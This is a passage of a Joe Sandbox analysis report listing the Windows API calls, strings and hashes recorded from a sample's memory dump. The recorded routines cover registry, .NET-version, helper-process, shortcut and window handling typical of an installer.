                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                              • API String ID: 971782779-3668018701
                                                                              • Opcode ID: f320f92f694209bf3d87b242267b6161fd66681942871ca2a5a7eb633dffa5fc
                                                                              • Instruction ID: 488d38facc3b5b4348deb9d7b7a0b4180c51b54c04cb4348039bcbbbcac6ad39
                                                                              • Opcode Fuzzy Hash: f320f92f694209bf3d87b242267b6161fd66681942871ca2a5a7eb633dffa5fc
                                                                              • Instruction Fuzzy Hash: 62D13574A001499FDB11EFA9D981BDDBBF5AF08304F50806AF904B7392C778AE45CB69
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegQueryValueExA.ADVAPI32(0045A9BA,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045A9BA,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                              • RegQueryValueExA.ADVAPI32(0045A9BA,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045A9BA,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                              • RegQueryValueExA.ADVAPI32(0045A9BA,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045A9BA,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                              Strings
                                                                              • RegOpenKeyEx, xrefs: 00454910
                                                                              • , xrefs: 004548FE
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$FormatMessageOpen
                                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2812809588-1577016196
                                                                              • Opcode ID: d2d2157a54bb89dc076ef9e0fa42170e86ba3ac777985cc89856524af98327e3
                                                                              • Instruction ID: 10c729c5df0f457655d9edc07d187ac9b2ad403c2690153cc8aec617143616fc
                                                                              • Opcode Fuzzy Hash: d2d2157a54bb89dc076ef9e0fa42170e86ba3ac777985cc89856524af98327e3
                                                                              • Instruction Fuzzy Hash: D1914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                              APIs
                                                                                • Part of subcall function 004591B4: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592F1,00000000,004594A9,?,00000000,00000000,00000000), ref: 00459201
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004594A9,?,00000000,00000000,00000000), ref: 0045934F
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004594A9,?,00000000,00000000,00000000), ref: 004593B9
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004594A9,?,00000000,00000000,00000000), ref: 00459420
                                                                              Strings
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045936C
                                                                              • v1.1.4322, xrefs: 00459412
                                                                              • v4.0.30319, xrefs: 00459341
                                                                              • v2.0.50727, xrefs: 004593AB
                                                                              • .NET Framework not found, xrefs: 0045946D
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459302
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593D3
                                                                              • .NET Framework version %s not found, xrefs: 00459459
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Open
                                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                              • API String ID: 2976201327-446240816
                                                                              • Opcode ID: 54e34cd44602b93ede3f7296a9310ab82d879df4d5c444ac47c898e8d614a2f1
                                                                              • Instruction ID: 97f3333ca529404cdccdc0b2d9ed50ca34310147e07c283222f48f4afab481b6
                                                                              • Opcode Fuzzy Hash: 54e34cd44602b93ede3f7296a9310ab82d879df4d5c444ac47c898e8d614a2f1
                                                                              • Instruction Fuzzy Hash: 7551B331A04144DBCB04DFA8D8A17EE77B6DB49305F54447BA841DB392E73D9E0ACB18
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(?), ref: 004588CB
                                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588E7
                                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588F5
                                                                              • GetExitCodeProcess.KERNEL32(?), ref: 00458906
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045894D
                                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458969
                                                                              Strings
                                                                              • Helper process exited, but failed to get exit code., xrefs: 0045893F
                                                                              • Helper isn't responding; killing it., xrefs: 004588D7
                                                                              • Helper process exited., xrefs: 00458915
                                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458933
                                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 004588BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                              • API String ID: 3355656108-1243109208
                                                                              • Opcode ID: 73dbfa3cdad617e305c3f832d4c000a78a7b9bdfac17e51cf2f5e1c942fa38a0
                                                                              • Instruction ID: 059a586d5f9fe809614c5be1e0bb00d3bdcd38e01f6b882276f5f7501e11c42c
                                                                              • Opcode Fuzzy Hash: 73dbfa3cdad617e305c3f832d4c000a78a7b9bdfac17e51cf2f5e1c942fa38a0
                                                                              • Instruction Fuzzy Hash: 4C2130706087409AD720E67AC485B6B76D4AF08305F00C82FB9DAE7693DE78E848D75B
                                                                              APIs
                                                                                • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                              Strings
                                                                              • RegCreateKeyEx, xrefs: 004545C3
                                                                              • , xrefs: 004545B1
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2481121983-1280779767
                                                                              • Opcode ID: 64c03f8d0974fb8baae80ac1f56f66a2074ee7a7d7e2c1940a2ac01f19c1dde8
                                                                              • Instruction ID: cde7545684c4620c2d036396f19d9a4160a162433608d969df8f63117b7f1412
                                                                              • Opcode Fuzzy Hash: 64c03f8d0974fb8baae80ac1f56f66a2074ee7a7d7e2c1940a2ac01f19c1dde8
                                                                              • Instruction Fuzzy Hash: AC81FF75A00209ABDB00DFD5C981BDEB7B9EB49309F50452AF900FB282D7789A45CB69
                                                                              APIs
                                                                                • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539BB
                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049683D
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496991), ref: 0049685E
                                                                              • CreateWindowExA.USER32(00000000,STATIC,004969A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496885
                                                                              • SetWindowLongA.USER32(?,000000FC,00496018), ref: 00496898
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496964,?,?,000000FC,00496018,00000000,STATIC,004969A0), ref: 004968C8
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049693C
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496964,?,?,000000FC,00496018,00000000), ref: 00496948
                                                                                • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                              • DestroyWindow.USER32(?,0049696B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496964,?,?,000000FC,00496018,00000000,STATIC), ref: 0049695E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                              • API String ID: 1549857992-2312673372
                                                                              • Opcode ID: 7b9aa83098eabb2dba0b70aa405a2d9f6b8f1b4b66eab831558cfba939a8a2a9
                                                                              • Instruction ID: 93ed1b954d13302bbccf96d2c338465d3c98789abcf3618d64464ab15fb4d88f
                                                                              • Opcode Fuzzy Hash: 7b9aa83098eabb2dba0b70aa405a2d9f6b8f1b4b66eab831558cfba939a8a2a9
                                                                              • Instruction Fuzzy Hash: 71412C70A04608AEDF00EBA5DC42FAE7BB8EB09714F51457AF400F7291D6799A008B69
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E1C0,00000000), ref: 0042E441
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E1C0,00000000), ref: 0042E495
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                              • API String ID: 4190037839-2312295185
                                                                              • Opcode ID: cc4cf932d7b220052410dacf18b487448e6dec6834fb41b85ae1fa26c47c2f69
                                                                              • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                              • Opcode Fuzzy Hash: cc4cf932d7b220052410dacf18b487448e6dec6834fb41b85ae1fa26c47c2f69
                                                                              • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 00462870
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462884
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462891
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0046289E
                                                                              • GetWindowRect.USER32(?,00000000), ref: 004628EA
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462928
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: 963cd5e9bec20ae9785dbab648af90e3917fdde5ac028f1e20745c9c218af8a1
                                                                              • Instruction ID: fe1f68fcdb92d8fdb5b24afc8a588ee1dd3fc27577eab862170fec9bd430383f
                                                                              • Opcode Fuzzy Hash: 963cd5e9bec20ae9785dbab648af90e3917fdde5ac028f1e20745c9c218af8a1
                                                                              • Instruction Fuzzy Hash: 4621C5B5301B056BD301EA648D41F3B3699EBC4714F05052AF944DB3C6E6B8EC048B9A
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F194
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: fe4f6826bb7301b99e83fbe15c42cc49c8205db95b757379d9683ee99bf223cf
                                                                              • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                              • Opcode Fuzzy Hash: fe4f6826bb7301b99e83fbe15c42cc49c8205db95b757379d9683ee99bf223cf
                                                                              • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C4B,?,00000000,00458CAE,?,?,02343858,00000000), ref: 00458AC9
                                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000,00000001,00000000,00000000,00000000,00458C4B), ref: 00458B26
                                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000,00000001,00000000,00000000,00000000,00458C4B), ref: 00458B33
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B7F
                                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458BB9,?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000), ref: 00458BA5
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,00458BB9,?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000), ref: 00458BAC
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                              • String ID: CreateEvent$TransactNamedPipe
                                                                              • API String ID: 2182916169-3012584893
                                                                              • Opcode ID: 971ff5326f64256da56b2a3a5e971e3af97d4d6353f8bcf162cac826e6801041
                                                                              • Instruction ID: 4e8b515c978fc0f7227371b00e454fc29eb41545a574c41675fd698137751177
                                                                              • Opcode Fuzzy Hash: 971ff5326f64256da56b2a3a5e971e3af97d4d6353f8bcf162cac826e6801041
                                                                              • Instruction Fuzzy Hash: D74185B1A00608AFDB15DF95CD41F9EB7F8FB48715F10406AF900F7292CA78AE44CA68
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CD1,?,?,00000031,?), ref: 00456B94
                                                                              • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B9A
                                                                              • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BE7
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                              • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                              • API String ID: 1914119943-2711329623
                                                                              • Opcode ID: ee3ea3d82efd4fb2b54eebd443786074e6cae9edf60e5ac548ea64bc7aca37c1
                                                                              • Instruction ID: 513f35abe53900720ade907ad6bd055a7f67a8f7377afb521354ad4100752fe6
                                                                              • Opcode Fuzzy Hash: ee3ea3d82efd4fb2b54eebd443786074e6cae9edf60e5ac548ea64bc7aca37c1
                                                                              • Instruction Fuzzy Hash: 54319671700604AFDB02EFAACD51D5BB7BDEB8974575284A6BC04D3752DA38DD04C728
                                                                              APIs
                                                                              • RectVisible.GDI32(?,?), ref: 00416E13
                                                                              • SaveDC.GDI32(?), ref: 00416E27
                                                                              • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                              • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                              • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                              • DeleteObject.GDI32(?), ref: 00416F22
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                              • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                              • DeleteObject.GDI32(?), ref: 00416F6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                              • String ID:
                                                                              • API String ID: 375863564-0
                                                                              • Opcode ID: 35a16e57ef2060bc5b86dfaf9fb4dd0844c8f61540c1a86612a76d2e62787fd3
                                                                              • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                              • Opcode Fuzzy Hash: 35a16e57ef2060bc5b86dfaf9fb4dd0844c8f61540c1a86612a76d2e62787fd3
                                                                              • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
